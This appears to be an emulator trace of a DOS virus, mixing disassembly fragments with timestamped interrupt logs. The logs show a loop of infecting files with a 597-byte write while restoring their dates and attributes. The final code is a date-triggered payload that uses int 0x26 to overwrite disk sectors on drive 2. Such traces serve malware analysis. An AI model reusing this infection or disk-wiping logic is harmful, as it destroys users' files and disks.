0x13f7e: mov cx, word ptr cs:[bp + 0x3d7]
0x13f83: nop
0x13f84: mov dx, word ptr cs:[bp + 0x3d9]
0x13f89: nop
0x13f8a: int 0x21
0x13f8c: mov ah, 0x3e
0x13f8e: nop
0x13f8f: int 0x21
0x13f91: xor cx, cx
0x13f93: nop
2018-12-25T12:36:39.606230764Z 64 PC: 140b0 | Write file or device (Write 597 bytes on handle 5)
2018-12-25T12:36:39.620461978Z 87 PC: 13f8c | Get or set file date and time
2018-12-25T12:36:39.62225055Z 62 PC: 13f91 | Close file
2018-12-25T12:36:39.630393881Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.649015804Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:39.652145709Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.659049182Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:39.673657751Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:39.675565522Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.704232123Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.713044605Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:39.72782617Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:39.731412789Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:39.750299244Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:39.760712928Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:39.762762701Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:39.784093912Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.794949076Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:39.797842254Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.805516189Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:39.812796082Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:39.814900927Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:39.825993285Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:39.833777177Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:39.837573172Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:39.839205221Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:39.842319564Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:40.087389393Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:40.089286292Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:40.154322761Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.169975983Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:40.172965789Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.181714254Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:40.189242729Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:40.191532822Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.521038655Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.544735993Z 64 PC: 13f5a | Write file or device (See above)
2018-12-25T12:36:40.546886648Z 66 PC: 13fa9 | Move file pointer (See above)
2018-12-25T12:36:40.54947514Z 44 PC: 13f69 | Get time (See above)
2018-12-25T12:36:40.552343992Z 64 PC: 140b0 | Write file or device (See above)
2018-12-25T12:36:40.562810106Z 87 PC: 13f8c | Get or set file date and time (See above)
2018-12-25T12:36:40.565449256Z 62 PC: 13f91 | Close file (See above)
2018-12-25T12:36:40.573348843Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.583355188Z 79 PC: 13ed6 | Find next file (See above)
2018-12-25T12:36:40.586564438Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.599082666Z 63 PC: 13ef9 | Read file or device (See above)
2018-12-25T12:36:40.607191244Z 62 PC: 13eff | Close file (See above)
2018-12-25T12:36:40.610519609Z 67 PC: 1400b | Get or set file attributes (See above)
2018-12-25T12:36:40.615489121Z 61 PC: 13fba | Open file (See above)
2018-12-25T12:36:40.620288256Z 42 PC: 13fc6 | Get date 0x13fc6: cmp al, 6
0x13fc8: nop
0x13fc9: je 0x13fd0
0x13fcb: mov ah, 0x4c
0x13fcd: nop
0x13fce: int 0x21
0x13fd0: mov byte ptr cs:[0x2ec], 0
0x13fd6: nop
0x13fd7: jmp 0x13fd9
0x13fd9: mov al, 2
0x13fdb: mov cx, 0xa0
0x13fde: mov dx, 0
0x13fe1: nop
0x13fe2: mov bx, 0
0x13fe5: int 0x26
0x13fe7: inc byte ptr cs:[0x2ec]
0x13fec: cmp byte ptr cs:[0x2ec], 0xa
0x13ff2: jne 0x13fd9
0x13ff4: mov ah, 9
0x13ff6: nop
2018-12-25T12:36:40.623310294Z 76 PC: 13fd0 | Terminate with return code (Return code = '2')